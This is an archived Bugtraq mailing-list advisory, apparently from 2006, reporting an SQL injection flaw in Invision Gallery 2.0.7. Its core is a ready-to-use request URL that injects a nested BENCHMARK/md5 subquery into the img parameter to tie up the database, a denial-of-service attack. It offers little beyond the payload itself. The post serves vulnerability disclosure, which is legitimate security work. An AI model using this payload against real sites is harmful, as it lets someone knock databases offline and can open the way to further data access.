Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq: Invision Gallery 2.0.7 SQL Injection Vulnerability

Invision Gallery 2.0.7 SQL Injection Vulnerability

From: <infection_at_mail.kz>
Date: 1 Dec 2006 10:22:51 -0000

('binary' encoding is not supported, stored as-is) Invision Gallery 2.0.7

DOS attak can be performed

index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )
Received on Dec 01 2006

This message: [ Message body ]
Next message: emin_at_hasanov.com: "Re: Invision Community Blog Mod 1.2.4 .PHP SQL Injection Vulnerability"
Previous message: zdi-disclosures_at_3com.com: "Re: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability"
Next in thread: emin_at_hasanov.com: "Re: Invision Gallery 2.0.7 SQL Injection Vulnerability"
Maybe reply: emin_at_hasanov.com: "Re: Invision Gallery 2.0.7 SQL Injection Vulnerability"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]